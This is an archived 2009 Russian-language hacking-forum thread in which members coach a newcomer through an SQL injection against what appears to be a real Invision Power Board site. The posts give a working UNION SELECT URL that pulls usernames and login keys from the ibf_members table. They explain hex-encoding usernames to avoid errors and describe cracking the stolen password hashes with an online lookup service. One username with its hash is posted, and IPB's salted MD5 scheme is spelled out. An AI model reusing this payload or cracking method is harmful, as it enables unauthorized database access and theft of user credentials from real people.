HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6491  
Старый 07.04.2009, 20:56
massovka
Познающий
Регистрация: 05.04.2009
Сообщений: 71
С нами: 9000055

Репутация: 5
По умолчанию

Цитата:
Сообщение от Kraneg  
massovka
Код:
concat(name,0x3a3a,member_login_key),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+from+ibf_members+where+name=NICK/*
Где NICK - это ник того кого ты хочешь вывести... вроде так если не ошибаюсь!
p.s. пробелов там нет =)
Вот что пише

Unknown column 'bybyby' in 'where clause
 
Ответить с цитированием

  #6492  
Старый 07.04.2009, 21:00
massovka
Познающий
Регистрация: 05.04.2009
Сообщений: 71
С нами: 9000055

Репутация: 5
По умолчанию

Цитата:
Сообщение от ph1l1ster  
Код:
where+name='NICK'
так лучше. если с ошибкой то NICK в хексе и без кавычек.

/index.php?showtopic=-1+union+select+1,concat(name,0x3a3a,member_login_k ey),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+from+ibf_members+where+na me=0x627962796279/*


Ответ пусто
 
Ответить с цитированием

  #6493  
Старый 07.04.2009, 21:04
massovka
Познающий
Регистрация: 05.04.2009
Сообщений: 71
С нами: 9000055

Репутация: 5
По умолчанию

Цитата:
Сообщение от massovka  
/index.php?showtopic=-1+union+select+1,concat(name,0x3a3a,member_login_k ey),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+from+ibf_members+where+na me=0x627962796279/*


Ответ пусто

Получилось увидел! Но возник 2 вопрос того кого я ищу нет! Но я точно знаю что такой юзер есть я сегодня его сам зарегистрировал! Может он вдругой базе? или как?
 
Ответить с цитированием

  #6494  
Старый 07.04.2009, 21:07
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
С нами: 9561436

Репутация: 462
По умолчанию

massovka, попобуй поищи по id, может у тебягде ошибка проверяй внимательней!
 
Ответить с цитированием

  #6495  
Старый 07.04.2009, 21:22
massovka
Познающий
Регистрация: 05.04.2009
Сообщений: 71
С нами: 9000055

Репутация: 5
По умолчанию

Цитата:
Сообщение от ph1l1ster  
massovka, попобуй поищи по id, может у тебягде ошибка проверяй внимательней!
Masterok 0x4d61737465726f6b
SpideR 0x537069646552

В базе порядка 1000 юзеров я вот взял те которые выше перевел как вы сказали! нахожу их без проблем

Сегодня днем зарегил bybyby(захожу по дним на сайте он есть 100%) ищу его как мне сказали выше ПУСТО

Проблема втом что у меня есть хэш всех юзеров я вчера до 5 утра начал перебирать http://hash.insidepro.com/index.php вот в этой базе! из 300 человек ни одного стндартного паролья Я В ШОКЕ!

Вот и зарегил сегодня bybyby посмотреть как он шыфруется!

и вот трабл его не могу в базе найти! Может там еще база с юзерами есть?
 
Ответить с цитированием

  #6496  
Старый 07.04.2009, 21:25
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами: 9510146

Репутация: 1550


По умолчанию

Цитата:
Сообщение от massovka  
Проблема втом что у меня есть хэш всех юзеров я вчера до 5 утра начал перебирать http://hash.insidepro.com/index.php вот в этой базе! из 300 человек ни одного стндартного паролья Я В ШОКЕ!
Уверен, что там мд5?
Если он, то уверен, что там не двойное шифрование?
 
Ответить с цитированием

  #6497  
Старый 07.04.2009, 21:44
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
С нами: 9561436

Репутация: 462
По умолчанию

massovka, md5(md5(salt)md5(pass))
 
Ответить с цитированием

  #6498  
Старый 07.04.2009, 22:42
massovka
Познающий
Регистрация: 05.04.2009
Сообщений: 71
С нами: 9000055

Репутация: 5
По умолчанию

Цитата:
Сообщение от wildshaman  
Уверен, что там мд5?
Если он, то уверен, что там не двойное шифрование?

Sofiya::659a4ba8be228cf0d54db65a213cf1fe

вот один из примеров! А так как я новичек незнаю двойной или не двойной он кто подскажет тому спасибо
 
Ответить с цитированием

  #6499  
Старый 07.04.2009, 22:46
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
С нами: 9561436

Репутация: 462
По умолчанию

Цитата:
Сообщение от massovka  
Sofiya::659a4ba8be228cf0d54db65a213cf1fe

вот один из примеров! А так как я новичек незнаю двойной или не двойной он кто подскажет тому спасибо
какая версия ipb?

1 - md5($pass)
2 - md5(md5($salt).md5($pass))
 
Ответить с цитированием

вот
  #6500  
Старый 07.04.2009, 23:11
massovka
Познающий
Регистрация: 05.04.2009
Сообщений: 71
С нами: 9000055

Репутация: 5
По умолчанию вот

Цитата:
Сообщение от ph1l1ster  
какая версия ipb?

- 5.0.45

1 - md5($pass)
2 - md5(md5($salt).md5($pass))

- 5.0.45
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.